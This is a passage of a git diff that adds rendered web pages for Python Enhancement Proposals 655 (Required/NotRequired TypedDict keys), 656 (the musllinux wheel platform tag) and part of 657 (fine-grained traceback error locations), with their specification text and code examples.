PEP 589 defines notation +for declaring a TypedDict with all required keys and notation for defining +a TypedDict with all potentially-missing keys, however it +does not provide a mechanism to declare some keys as required and others +as potentially-missing. This PEP introduces two new notations: +Required[], which can be used on individual items of a +TypedDict to mark them as required, and +NotRequired[], which can be used on individual items +to mark them as potentially-missing.

+

This PEP makes no Python grammar changes. Correct usage +of required and potentially-missing keys of TypedDicts is intended to be +enforced only by static type checkers and need not be enforced by +Python itself at runtime.

+
+
+

Motivation

+

It is not uncommon to want to define a TypedDict with some keys that are +required and others that are potentially-missing. Currently the only way +to define such a TypedDict is to declare one TypedDict with one value +for total and then inherit it from another TypedDict with a +different value for total:

+
class _MovieBase(TypedDict):  # implicitly total=True
+    title: str
+
+class Movie(_MovieBase, total=False):
+    year: int
+
+
+

Having to declare two different TypedDict types for this purpose is +cumbersome.

+

This PEP introduces two new type qualifiers, typing.Required and +typing.NotRequired, which allow defining a single TypedDict with +a mix of both required and potentially-missing keys:

+
class Movie(TypedDict):
+    title: str
+    year: NotRequired[int]
+
+
+

This PEP also makes it possible to define TypedDicts in the +alternative functional syntax +with a mix of required and potentially-missing keys, +which is not currently possible at all because the alternative syntax does +not support inheritance:

+
Actor = TypedDict('Actor', {
+    'name': str,
+    # "in" is a keyword, so the functional syntax is necessary
+    'in': NotRequired[List[str]],
+})
+
+
+
+
+

Rationale

+

One might think it unusual to propose notation that prioritizes marking +required keys rather than potentially-missing keys, as is +customary in other languages like TypeScript:

+
interface Movie {
+    title: string;
+    year?: number;  // ? marks potentially-missing keys
+}
+
+
+

The difficulty is that the best word for marking a potentially-missing +key, Optional[], is already used in Python for a completely +different purpose: marking values that could be either of a particular +type or None. In particular the following does not work:

+
class Movie(TypedDict):
+    ...
+    year: Optional[int]  # means int|None, not potentially-missing!
+
+
+

Attempting to use any synonym of “optional” to mark potentially-missing +keys (like Missing[]) would be too similar to Optional[] +and be easy to confuse with it.

+

Thus it was decided to focus on positive-form phrasing for required keys +instead, which is straightforward to spell as Required[].

+

Nevertheless it is common for folks wanting to extend a regular +(total=True) TypedDict to only want to add a small number of +potentially-missing keys, which necessitates a way to mark keys that are +not required and potentially-missing, and so we also allow the +NotRequired[] form for that case.

+
+
+

Specification

+

The typing.Required type qualifier is used to indicate that a +variable declared in a TypedDict definition is a required key:

+
class Movie(TypedDict, total=False):
+    title: Required[str]
+    year: int
+
+
+

Additionally the typing.NotRequired type qualifier is used to +indicate that a variable declared in a TypedDict definition is a +potentially-missing key:

+
class Movie(TypedDict):  # implicitly total=True
+    title: str
+    year: NotRequired[int]
+
+
+

It is an error to use Required[] or NotRequired[] in any +location that is not an item of a TypedDict. +Type checkers must enforce this restriction.

+

It is valid to use Required[] and NotRequired[] even for +items where it is redundant, to enable additional explicitness if desired:

+
class Movie(TypedDict):
+    title: Required[str]  # redundant
+    year: NotRequired[int]
+
+
+

It is an error to use both Required[] and NotRequired[] at the +same time:

+
class Movie(TypedDict):
+    title: str
+    year: NotRequired[Required[int]]  # ERROR
+
+
+

Type checkers must enforce this restriction. +The runtime implementations of Required[] and NotRequired[] +may also enforce this restriction.

+

The alternative functional syntax +for TypedDict also supports +Required[] and NotRequired[]:

+
Movie = TypedDict('Movie', {'name': str, 'year': NotRequired[int]})
+
+
+
+

Interaction with total=False

+

Any PEP 589-style TypedDict declared with total=False is equivalent +to a TypedDict with an implicit total=True definition with all of its +keys marked as NotRequired[].

+

Therefore:

+
class _MovieBase(TypedDict):  # implicitly total=True
+    title: str
+
+class Movie(_MovieBase, total=False):
+    year: int
+
+
+

is equivalent to:

+
class _MovieBase(TypedDict):
+    title: str
+
+class Movie(_MovieBase):
+    year: NotRequired[int]
+
+
+
+
+

Interaction with Annotated[]

+

Required[] and NotRequired[] can be used with Annotated[], +in any nesting order:

+
class Movie(TypedDict):
+    title: str
+    year: NotRequired[Annotated[int, ValueRange(-9999, 9999)]]  # ok
+
+
+
class Movie(TypedDict):
+    title: str
+    year: Annotated[NotRequired[int], ValueRange(-9999, 9999)]  # ok
+
+
+

In particular allowing Annotated[] to be the outermost annotation +for an item allows better interoperability with non-typing uses of +annotations, which may always want Annotated[] as the outermost annotation. +[3]

+
+
+

Runtime behavior

+
+

Interaction with get_type_hints()

+

typing.get_type_hints(...) applied to a TypedDict will by default +strip out any Required[] or NotRequired[] type qualifiers, +since these qualifiers are expected to be inconvenient for code +casually introspecting type annotations.

+

typing.get_type_hints(..., include_extras=True) however +will retain Required[] and NotRequired[] type qualifiers, +for advanced code introspecting type annotations that +wishes to preserve all annotations in the original source:

+
class Movie(TypedDict):
+    title: str
+    year: NotRequired[int]
+
+assert get_type_hints(Movie) == \
+    {'title': str, 'year': int}
+assert get_type_hints(Movie, include_extras=True) == \
+    {'title': str, 'year': NotRequired[int]}
+
+
+
+
+

Interaction with get_origin() and get_args()

+

typing.get_origin() and typing.get_args() will be updated to +recognize Required[] and NotRequired[]:

+
assert get_origin(Required[int]) is Required
+assert get_args(Required[int]) == (int,)
+
+assert get_origin(NotRequired[int]) is NotRequired
+assert get_args(NotRequired[int]) == (int,)
+
+
+
+
+

Interaction with __required_keys__ and __optional_keys__

+

An item marked with Required[] will always appear +in the __required_keys__ for its enclosing TypedDict. Similarly an item +marked with NotRequired[] will always appear in __optional_keys__.

+
assert Movie.__required_keys__ == frozenset({'title'})
+assert Movie.__optional_keys__ == frozenset({'year'})
+
+
+
+
+
+
+

Backwards Compatibility

+

No backward incompatible changes are made by this PEP.

+
+
+

How to Teach This

+

To define a TypedDict where most keys are required and some are +potentially-missing, define a single TypedDict as normal +(without the total keyword) +and mark those few keys that are potentially-missing with NotRequired[].

+

To define a TypedDict where most keys are potentially-missing and a few are +required, define a total=False TypedDict +and mark those few keys that are required with Required[].

+

If some items accept None in addition to a regular value, it is +recommended that the TYPE|None notation be preferred over +Optional[TYPE] for marking such item values, to avoid using +Required[] or NotRequired[] alongside Optional[] +within the same TypedDict definition:

+

Yes:

+
from __future__ import annotations  # for Python 3.7-3.9
+
+class Dog(TypedDict):
+    name: str
+    owner: NotRequired[str|None]
+
+
+

Okay (required for Python 3.5.3-3.6):

+
class Dog(TypedDict):
+    name: str
+    owner: 'NotRequired[str|None]'
+
+
+

No:

+
class Dog(TypedDict):
+    name: str
+    # ick; avoid using both Optional and NotRequired
+    owner: NotRequired[Optional[str]]
+
+
+
+

Usage in Python <3.11

+

If your code supports Python <3.11 and wishes to use Required[] or +NotRequired[] then it should use typing_extensions.TypedDict rather +than typing.TypedDict because the latter will not understand +(Not)Required[]. In particular __required_keys__ and +__optional_keys__ on the resulting TypedDict type will not be correct:

+

Yes (Python 3.11+ only):

+
from typing import NotRequired, TypedDict
+
+class Dog(TypedDict):
+    name: str
+    owner: NotRequired[str|None]
+
+
+

Yes (Python <3.11 and 3.11+):

+
from __future__ import annotations  # for Python 3.7-3.9
+
+from typing_extensions import NotRequired, TypedDict  # for Python <3.11 with (Not)Required
+
+class Dog(TypedDict):
+    name: str
+    owner: NotRequired[str|None]
+
+
+

No (Python <3.11 and 3.11+):

+
from typing import TypedDict  # oops: should import from typing_extensions instead
+from typing_extensions import NotRequired
+
+class Movie(TypedDict):
+    title: str
+    year: NotRequired[int]
+
+assert Movie.__required_keys__ == frozenset({'title', 'year'})  # yikes
+assert Movie.__optional_keys__ == frozenset()  # yikes
+
+
+
+
+
+

Reference Implementation

+

The mypy +0.930, +pyright +1.1.117, +and pyanalyze +0.4.0 +type checkers support Required and NotRequired.

+

A reference implementation of the runtime component is provided in the +typing_extensions +module.

+
+
+

Rejected Ideas

+
+

Special syntax around the key of a TypedDict item

+
class MyThing(TypedDict):
+    opt1?: str  # may not exist, but if exists, value is string
+    opt2: Optional[str]  # always exists, but may have None value
+
+
+

This notation would require Python grammar changes and it is not +believed that marking TypedDict items as required or potentially-missing +would meet the high bar required to make such grammar changes.

+
class MyThing(TypedDict):
+    Optional[opt1]: str  # may not exist, but if exists, value is string
+    opt2: Optional[str]  # always exists, but may have None value
+
+
+

This notation causes Optional[] to take on different meanings depending +on where it is positioned, which is inconsistent and confusing.

+

Also, “let’s just not put funny syntax before the colon.” [1]

+
+
+

Marking required or potentially-missing keys with an operator

+

We could use unary + as shorthand to mark a required key, unary +- to mark a potentially-missing key, or unary ~ to mark a key +with opposite-of-normal totality:

+
class MyThing(TypedDict, total=False):
+    req1: +int    # + means a required key, or Required[]
+    opt1: str
+    req2: +float
+
+class MyThing(TypedDict):
+    req1: int
+    opt1: -str    # - means a potentially-missing key, or NotRequired[]
+    req2: float
+
+class MyThing(TypedDict):
+    req1: int
+    opt1: ~str    # ~ means a opposite-of-normal-totality key
+    req2: float
+
+
+

Such operators could be implemented on type via the __pos__, +__neg__ and __invert__ special methods without modifying the +grammar.

+

It was decided that it would be prudent to introduce long-form notation +(i.e. Required[] and NotRequired[]) before introducing +any short-form notation. Future PEPs may reconsider introducing this +or other short-form notation options.

+

Note when reconsidering introducing this short-form notation that ++, -, and ~ already have existing meanings in the Python +typing world: covariant, contravariant, and invariant:

+
>>> from typing import TypeVar
+>>> (TypeVar('T', covariant=True), TypeVar('U', contravariant=True), TypeVar('V'))
+(+T, -U, ~V)
+
+
+
+
+

Marking absence of a value with a special constant

+

We could introduce a new type-level constant which signals the absence +of a value when used as a union member, similar to JavaScript’s +undefined type, perhaps called Missing:

+
class MyThing(TypedDict):
+    req1: int
+    opt1: str|Missing
+    req2: float
+
+
+

Such a Missing constant could also be used for other scenarios such +as the type of a variable which is only conditionally defined:

+
class MyClass:
+    attr: int|Missing
+
+    def __init__(self, set_attr: bool) -> None:
+        if set_attr:
+            self.attr = 10
+
+
+
def foo(set_attr: bool) -> None:
+    if set_attr:
+        attr = 10
+    reveal_type(attr)  # int|Missing
+
+
+
+

Misalignment with how unions apply to values

+

However this use of ...|Missing, equivalent to +Union[..., Missing], doesn’t align well with what a union normally +means: Union[...] always describes the type of a value that is +present. By contrast missingness or non-totality is a property of a +variable instead. Current precedent for marking properties of a +variable include Final[...] and ClassVar[...], which the +proposal for Required[...] is aligned with.

+
+
+

Misalignment with how unions are subdivided

+

Furthermore the use of Union[..., Missing] doesn’t align with the +usual ways that union values are broken down: Normally you can eliminate +components of a union type using isinstance checks:

+
class Packet:
+    data: Union[str, bytes]
+
+def send_data(packet: Packet) -> None:
+    if isinstance(packet.data, str):
+        reveal_type(packet.data)  # str
+        packet_bytes = packet.data.encode('utf-8')
+    else:
+        reveal_type(packet.data)  # bytes
+        packet_bytes = packet.data
+    socket.send(packet_bytes)
+
+
+

However if we were to allow Union[..., Missing] you’d either have to +eliminate the Missing case with hasattr for object attributes:

+
class Packet:
+    data: Union[str, Missing]
+
+def send_data(packet: Packet) -> None:
+    if hasattr(packet, 'data'):
+        reveal_type(packet.data)  # str
+        packet_bytes = packet.data.encode('utf-8')
+    else:
+        reveal_type(packet.data)  # Missing? error?
+        packet_bytes = b''
+    socket.send(packet_bytes)
+
+
+

or a check against locals() for local variables:

+
def send_data(packet_data: Optional[str]) -> None:
+    packet_bytes: Union[str, Missing]
+    if packet_data is not None:
+        packet_bytes = packet.data.encode('utf-8')
+
+    if 'packet_bytes' in locals():
+        reveal_type(packet_bytes)  # bytes
+        socket.send(packet_bytes)
+    else:
+        reveal_type(packet_bytes)  # Missing? error?
+
+
+

or a check via other means, such as against globals() for global +variables:

+
warning: Union[str, Missing]
+import sys
+if sys.version_info < (3, 6):
+    warning = 'Your version of Python is unsupported!'
+
+if 'warning' in globals():
+    reveal_type(warning)  # str
+    print(warning)
+else:
+    reveal_type(warning)  # Missing? error?
+
+
+

Weird and inconsistent. Missing is not really a value at all; it’s +an absence of definition and such an absence should be treated +specially.

+
+
+

Difficult to implement

+

Eric Traut from the Pyright type checker team has stated that +implementing a Union[..., Missing]-style notation would be +difficult. [2]

+
+
+

Introduces a second null-like value into Python

+

Defining a new Missing type-level constant would be very close to +introducing a new Missing value-level constant at runtime, creating +a second null-like runtime value in addition to None. Having two +different null-like constants in Python (None and Missing) would +be confusing. Many newcomers to JavaScript already have difficulty +distinguishing between its analogous constants null and +undefined.

+
+
+
+

Replace Optional with Nullable. Repurpose Optional to mean “optional item”.

+

Optional[] is too ubiquitous to deprecate, although use of it +may fade over time in favor of the T|None notation specified by PEP 604.

+
+
+

Change Optional to mean “optional item” in certain contexts instead of “nullable”

+

Consider the use of a special flag on a TypedDict definition to alter +the interpretation of Optional inside the TypedDict to mean +“optional item” rather than its usual meaning of “nullable”:

+
class MyThing(TypedDict, optional_as_missing=True):
+    req1: int
+    opt1: Optional[str]
+
+
+

or:

+
class MyThing(TypedDict, optional_as_nullable=False):
+    req1: int
+    opt1: Optional[str]
+
+
+

This would add more confusion for users because it would mean that in +some contexts the meaning of Optional[] is different than in +other contexts, and it would be easy to overlook the flag.

+
+
+

Various synonyms for “potentially-missing item”

+
    +
  • Omittable – too easy to confuse with optional
  • +
  • OptionalItem, OptionalKey – two words; too easy to confuse with +optional
  • +
  • MayExist, MissingOk – two words
  • +
  • Droppable – too similar to Rust’s Drop, which means something +different
  • +
  • Potential – too vague
  • +
  • Open – sounds like applies to an entire structure rather then to an +item
  • +
  • Excludable
  • +
  • Checked
  • +
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0655.rst

+

Last modified: 2024-06-16 22:42:44 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0656/index.html b/pep-0656/index.html new file mode 100644 index 00000000000..b5a6c80b813 --- /dev/null +++ b/pep-0656/index.html @@ -0,0 +1,348 @@ + + + + + + + + PEP 656 – Platform Tag for Linux Distributions Using Musl | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 656 – Platform Tag for Linux Distributions Using Musl

+
+
Author:
+
Tzu-ping Chung <uranusjr at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
17-Mar-2021
+
Post-History:
+
17-Mar-2021, 18-Apr-2021
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new platform tag series musllinux for +binary Python package distributions for a Python installation that +depends on musl on a Linux distribution. The tag works similarly to +the “perennial manylinux” platform tags specified in PEP 600, but +targeting platforms based on musl instead.

+
+
+

Motivation

+

With the wide use of containers, distributions such as Alpine Linux +[alpine], have been gaining more popularity than ever. Many of them +based on musl [musl], a different libc implementation from glibc, and +therefore cannot use the existing manylinux platform tags. This +means that Python package projects cannot deploy binary distributions +on PyPI for them. Users of such projects demand build constraints from +those projects, putting unnecessary burden on project maintainers.

+
+
+

Rationale

+

According to the documentation, musl has a stable ABI, and maintains +backwards compatibility [musl-compatibility] [compare-libcs], so a +binary compiled against an earlier version of musl is guaranteed to +run against a newer musl runtime [musl-compat-ml]. Therefore, we use +a scheme similar to the glibc-version-based manylinux tags, but +against musl versions instead of glibc.

+

Logic behind the new platform tag largely follows PEP 600 +(“perennial manylinux”), and requires wheels using this tag make +similar promises. Please refer to PEP 600 for more details on +rationale and reasoning behind the design.

+

The musllinux platform tags only apply to Python interpreters +dynamically linked against the musl libc and executed on the runtime +shared library, on a Linux operating system. Statically linked +interpreters or mixed builds with other libc implementations (such as +glibc) are out of scope and not supported by platform tags defined in +this document. Such interpreters should not claim compatibility with +musllinux platform tags.

+
+
+

Specification

+

Tags using the new scheme will take the form:

+
musllinux_${MUSLMAJOR}_${MUSLMINOR}_${ARCH}
+
+
+

This tag promises the wheel works on any mainstream Linux distribution +that uses musl version ${MUSLMAJOR}.${MUSLMINOR}, following the +perennial design. All other system-level dependency requirements rely +on the community’s definition to the intentionally vague “mainstream” +description introduced in PEP 600. A wheel may make use of newer +system dependencies when all mainstream distributions using the +specified musl version provide the dependency by default; once all +mainstream distributions on the musl version ship a certain dependency +version by default, users relying on older versions are automatically +removed from the coverage of that musllinux tag.

+
+

Reading the musl version

+

The musl version values can be obtained by executing the musl libc +shared library the Python interpreter is currently running on, and +parsing the output:

+
import re
+import subprocess
+
+def get_musl_major_minor(so: str) -> tuple[int, int] | None:
+    """Detect musl runtime version.
+
+    Returns a two-tuple ``(major, minor)`` that indicates musl
+    library's version, or ``None`` if the given libc .so does not
+    output expected information.
+
+    The libc library should output something like this to stderr::
+
+        musl libc (x86_64)
+        Version 1.2.2
+        Dynamic Program Loader
+    """
+    proc = subprocess.run([so], stderr=subprocess.PIPE, text=True)
+    lines = (line.strip() for line in proc.stderr.splitlines())
+    lines = [line for line in lines if line]
+    if len(lines) < 2 or lines[0][:4] != "musl":
+        return None
+    match = re.match(r"Version (\d+)\.(\d+)", lines[1])
+    if match:
+        return (int(match.group(1)), int(match.group(2)))
+    return None
+
+
+

There are currently two possible ways to find the musl library’s +location that a Python interpreter is running on, either with the +system ldd command [ldd], or by parsing the PT_INTERP +section’s value from the executable’s ELF header [elf].

+
+
+

Formatting the tag

+

Distributions using the tag make similar promises to those described +in PEP 600, including:

+
    +
  1. The distribution works on any mainstream Linux distributions with +musl version ${MUSLMAJOR}.${MUSLMINOR} or later.
  2. +
  3. The distribution’s ${ARCH} matches the return value of +sysconfig.get_platform() on the host system, replacing period +(.) and hyphen (-) characters with underscores (_), as +outlined in PEP 425 and PEP 427.
  4. +
+

Example values:

+
musllinux_1_1_x86_64   # musl 1.1 running on x86-64.
+musllinux_1_2_aarch64  # musl 1.2 running on ARM 64-bit.
+
+
+

The value can be formatted with the following Python code:

+
import sysconfig
+
+def format_musllinux(musl_version: tuple[int, int]) -> str:
+    os_name, sep, arch = sysconfig.get_platform().partition("-")
+    assert os_name == "linux" and sep, "Not a Linux"
+    arch = arch.replace(".", "_").replace("-", "_")
+    return f"musllinux_{musl_version[0]}_{musl_version[1]}_{arch}"
+
+
+
+
+

Recommendations to package indexes

+

It is recommended for Python package repositories, including PyPI, to +accept platform tags matching the following regular expression:

+
musllinux_([0-9]+)_([0-9]+)_([^.-]+)
+
+
+

Python package repositories may impose additional requirements to +reject Wheels with known issues, including but not limited to:

+
    +
  • A musllinux_1_1 wheel containing symbols only available in musl +1.2 or later.
  • +
  • Wheel that depends on external libraries not considered generally +available to the intended audience of the package index.
  • +
  • A platform tag claiming compatibility to a non-existent musl version +(like musllinux_9000_0).
  • +
+

Such policies are ultimately up to individual package repositories. +It is not the author’s intention to impose restrictions to the +maintainers.

+
+
+
+

Backwards Compatibility

+

There are no backwards compatibility concerns in this PEP.

+
+
+

Rejected Ideas

+
+

Create a platform tag based specifically for Alpine Linux

+

Past experience on the manylinux tag series shows this approach +would be too costly time-wise. The author feels the “works well with +others” rule both is more inclusive and works well enough in practice.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0656.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0657/index.html b/pep-0657/index.html new file mode 100644 index 00000000000..072c02a36a8 --- /dev/null +++ b/pep-0657/index.html @@ -0,0 +1,574 @@ + + + + + + + + PEP 657 – Include Fine Grained Error Locations in Tracebacks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 657 – Include Fine Grained Error Locations in Tracebacks

+
+
Author:
+
Pablo Galindo <pablogsal at python.org>, +Batuhan Taskaya <batuhan at python.org>, +Ammar Askar <ammar at ammaraskar.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
08-May-2021
+
Python-Version:
+
3.11
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding a mapping from each bytecode instruction to the start +and end column offsets of the line that generated them as well as the end line +number. This data will be used to improve tracebacks displayed by the CPython +interpreter in order to improve the debugging experience. The PEP also proposes +adding APIs that allow other tools (such as coverage analysis tools, profilers, +tracers, debuggers) to consume this information from code objects.

+
+
+

Motivation

+

The primary motivation for this PEP is to improve the feedback presented about +the location of errors to aid with debugging.

+

Python currently keeps a mapping of bytecode to line numbers from compilation. +The interpreter uses this mapping to point to the source line associated with +an error. While this line-level granularity for instructions is useful, a +single line of Python code can compile into dozens of bytecode operations +making it hard to track which part of the line caused the error.

+

Consider the following line of Python code:

+
x['a']['b']['c']['d'] = 1
+
+
+

If any of the values in the dictionaries are None, the error shown is:

+
Traceback (most recent call last):
+  File "test.py", line 2, in <module>
+    x['a']['b']['c']['d'] = 1
+TypeError: 'NoneType' object is not subscriptable
+
+
+

From the traceback, it is impossible to determine which one of the dictionaries +had the None element that caused the error. Users often have to attach a +debugger or split up their expression to track down the problem.

+

However, if the interpreter had a mapping of bytecode to column offsets as well +as line numbers, it could helpfully display:

+
Traceback (most recent call last):
+  File "test.py", line 2, in <module>
+    x['a']['b']['c']['d'] = 1
+    ~~~~~~~~~~~^^^^^
+TypeError: 'NoneType' object is not subscriptable
+
+
+

indicating to the user that the object x['a']['b'] must have been None. +This highlighting will occur for every frame in the traceback. For instance, if +a similar error is part of a complex function call chain, the traceback would +display the code associated to the current instruction in every frame:

+
Traceback (most recent call last):
+  File "test.py", line 14, in <module>
+    lel3(x)
+    ^^^^^^^
+  File "test.py", line 12, in lel3
+    return lel2(x) / 23
+           ^^^^^^^
+  File "test.py", line 9, in lel2
+    return 25 + lel(x) + lel(x)
+                ^^^^^^
+  File "test.py", line 6, in lel
+    return 1 + foo(a,b,c=x['z']['x']['y']['z']['y'], d=e)
+                         ~~~~~~~~~~~~~~~~^^^^^
+TypeError: 'NoneType' object is not subscriptable
+
+
+

This problem presents itself in the following situations.

+
    +
  • When passing down multiple objects to function calls while +accessing the same attribute in them. +For instance, this error:
    Traceback (most recent call last):
    +  File "test.py", line 19, in <module>
    +    foo(a.name, b.name, c.name)
    +AttributeError: 'NoneType' object has no attribute 'name'
    +
    +
    +

    With the improvements in this PEP this would show:

    +
    Traceback (most recent call last):
    +  File "test.py", line 17, in <module>
    +    foo(a.name, b.name, c.name)
    +                ^^^^^^
    +AttributeError: 'NoneType' object has no attribute 'name'
    +
    +
    +
  • +
  • When dealing with lines with complex mathematical expressions, +especially with libraries such as numpy where arithmetic +operations can fail based on the arguments. For example:
    Traceback (most recent call last):
    +  File "test.py", line 1, in <module>
    +    x = (a + b) @ (c + d)
    +ValueError: operands could not be broadcast together with shapes (1,2) (2,3)
    +
    +
    +

    There is no clear indication as to which operation failed, was it the addition +on the left, the right or the matrix multiplication in the middle? With this +PEP the new error message would look like:

    +
    Traceback (most recent call last):
    +  File "test.py", line 1, in <module>
    +    x = (a + b) @ (c + d)
    +                   ~~^~~
    +ValueError: operands could not be broadcast together with shapes (1,2) (2,3)
    +
    +
    +

    Giving a much clearer and easier to debug error message.

    +
  • +
+

Debugging aside, this extra information would also be useful for code +coverage tools, enabling them to measure expression-level coverage instead of +just line-level coverage. For instance, given the following line:

+
x = foo() if bar() else baz()
+
+
+

coverage, profile or state analysis tools will highlight the full line in both +branches, making it impossible to differentiate what branch was taken. This is +a known problem in pycoverage.

+

Similar efforts to this PEP have taken place in other languages such as Java in +the form of JEP358. NullPointerExceptions in Java were similarly nebulous when +it came to lines with complicated expressions. A NullPointerException would +provide very little aid in finding the root cause of an error. The +implementation for JEP358 is fairly complex, requiring walking back through the +bytecode by using a control flow graph analyzer and decompilation techniques to +recover the source code that led to the null pointer. Although the complexity +of this solution is high and requires maintenance for the decompiler every time +Java bytecode is changed, this improvement was deemed to be worth it for the +extra information provided for just one exception type.

+
+
+

Rationale

+

In order to identify the range of source code being executed when exceptions +are raised, this proposal requires adding new data for every bytecode +instruction. This will have an impact on the size of pyc files on disk and +the size of code objects in memory. The authors of this proposal have chosen +the data types in a way that tries to minimize this impact. The proposed +overhead is storing two uint8_t (one for the start offset and one for the +end offset) and the end line information for every bytecode instruction (in +the same encoded fashion as the start line is stored currently).

+

As an illustrative example to gauge the impact of this change, we have +calculated that including the start and end offsets will increase the size of +the standard library’s pyc files by 22% (6MB) from 28.4MB to 34.7MB. The +overhead in memory usage will be the same (assuming the full standard library +is loaded into the same program). We believe that this is a very acceptable +number since the order of magnitude of the overhead is very small, especially +considering the storage size and memory capabilities of modern computers. +Additionally, in general the memory size of a Python program is not dominated +by code objects. To check this assumption we have executed the test suite of +several popular PyPI projects (including NumPy, pytest, Django and Cython) as +well as several applications (Black, pylint, mypy executed over either mypy or +the standard library) and we found that code objects represent normally 3-6% of +the average memory size of the program.

+

We understand that the extra cost of this information may not be acceptable for +some users, so we propose an opt-out mechanism which will cause generated code +objects to not have the extra information while also allowing pyc files to not +include the extra information.

+
+
+

Specification

+

In order to have enough information to correctly resolve the location +within a given line where an error was raised, a map linking bytecode +instructions to column offsets (start and end offset) and end line numbers +is needed. This is similar in fashion to how line numbers are currently linked +to bytecode instructions.

+

The following changes will be performed as part of the implementation of +this PEP:

+
    +
  • The offset information will be exposed to Python via a new attribute in the +code object class called co_positions that will return a sequence of +four-element tuples containing the full location of every instruction +(including start line, end line, start column offset and end column offset) +or None if the code object was created without the offset information.
  • +
  • One new C-API function:
    int PyCode_Addr2Location(
    +    PyCodeObject *co, int addrq,
    +    int *start_line, int *start_column,
    +    int *end_line, int *end_column)
    +
    +
    +

    will be added so the end line, the start column offsets and the end column +offset can be obtained given the index of a bytecode instruction. This +function will set the values to 0 if the information is not available.

    +
  • +
+

The internal storage, compression and encoding of the information is left as an +implementation detail and can be changed at any point as long as the public API +remains unchanged.

+
+

Offset semantics

+

These offsets are propagated by the compiler from the ones stored currently in +all AST nodes. The output of the public APIs (co_positions and PyCode_Addr2Location) +that deal with these attributes use 0-indexed offsets (just like the AST nodes), but the underlying +implementation is free to represent the actual data in whatever form they choose to be most efficient. +The error code regarding information not available is None for the co_positions() API, +and -1 for the PyCode_Addr2Location API. The availability of the information highly depends +on whether the offsets fall under the range, as well as the runtime flags for the interpreter +configuration.

+

The AST nodes use int types to store these values. The current implementation, however, +utilizes uint8_t types as an implementation detail to minimize storage impact. This decision +allows offsets to go from 0 to 255, while offsets bigger than these values will be treated as +missing (returning -1 on the PyCode_Addr2Location and None API in the co_positions() API).

+

As specified previously, the underlying storage of the offsets should be +considered an implementation detail, as the public APIs to obtain this values +will return either C int types or Python int objects, which allows to +implement better compression/encoding in the future if bigger ranges would need +to be supported. This PEP proposes to start with this simpler version and +defer improvements to future work.

+
+
+

Displaying tracebacks

+

When displaying tracebacks, the default exception hook will be modified to +query this information from the code objects and use it to display a sequence +of carets for every displayed line in the traceback if the information is +available. For instance:

+
  File "test.py", line 6, in lel
+    return 1 + foo(a,b,c=x['z']['x']['y']['z']['y'], d=e)
+                         ~~~~~~~~~~~~~~~~^^^^^
+TypeError: 'NoneType' object is not subscriptable
+
+
+

When displaying tracebacks, instruction offsets will be taken from the +traceback objects. This makes highlighting exceptions that are re-raised work +naturally without the need to store the new information in the stack. For +example, for this code:

+
def foo(x):
+    1 + 1/0 + 2
+
+def bar(x):
+    try:
+        1 + foo(x) + foo(x)
+    except Exception as e:
+        raise ValueError("oh no!") from e
+
+bar(bar(bar(2)))
+
+
+

The printed traceback would look like this:

+
Traceback (most recent call last):
+  File "test.py", line 6, in bar
+    1 + foo(x) + foo(x)
+        ^^^^^^
+  File "test.py", line 2, in foo
+    1 + 1/0 + 2
+        ~^~
+ZeroDivisionError: division by zero
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+  File "test.py", line 10, in <module>
+    bar(bar(bar(2)))
+            ^^^^^^
+  File "test.py", line 8, in bar
+    raise ValueError("oh no!") from e
+    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+ValueError: oh no
+
+
+

While this code:

+
def foo(x):
+    1 + 1/0 + 2
+def bar(x):
+    try:
+        1 + foo(x) + foo(x)
+    except Exception:
+        raise
+bar(bar(bar(2)))
+
+
+

Will be displayed as:

+
Traceback (most recent call last):
+  File "test.py", line 10, in <module>
+    bar(bar(bar(2)))
+            ^^^^^^
+  File "test.py", line 6, in bar
+    1 + foo(x) + foo(x)
+        ^^^^^^
+  File "test.py", line 2, in foo
+    1 + 1/0 + 2
+        ~^~
+ZeroDivisionError: division by zero
+
+
+

Maintaining the current behavior, only a single line will be displayed +in tracebacks. For instructions that span multiple lines (the end offset +and the start offset belong to different lines), the end line number must +be inspected to know if the end offset applies to the same line as the +starting offset.

+
+
+

Opt-out mechanism

+

To offer an opt-out mechanism for those users that care about the +storage and memory overhead and to allow third party tools and other +programs that are currently parsing tracebacks to catch up the following +methods will be provided to deactivate this feature:

+
    +
  • A new environment variable: PYTHONNODEBUGRANGES.
  • +
  • A new command line option for the dev mode: python -Xno_debug_ranges.
  • +
+

If any of these methods are used, the Python compiler will not populate +code objects with the new information (None will be used instead) and any +unmarshalled code objects that contain the extra information will have it stripped +away and replaced with None). Additionally, the traceback machinery will not +show the extended location information even if the information was present. +This method allows users to:

+
    +
  • Create smaller pyc files by using one of the two methods when said files +are created.
  • +
  • Don’t load the extra information from pyc files if those were created with +the extra information in the first place.
  • +
  • Deactivate the extra information when displaying tracebacks (the caret characters +indicating the location of the error).
  • +
+

Doing this has a very small performance hit as the interpreter state needs +to be fetched when code objects are created to look up the configuration. +Creating code objects is not a performance sensitive operation so this should +not be a concern.

+
+
+
+

Backwards Compatibility

+

The change is fully backwards compatible.

+
+
+

Reference Implementation

+

A reference implementation can be found in the implementation fork.

+
+
+

Rejected Ideas

+
+

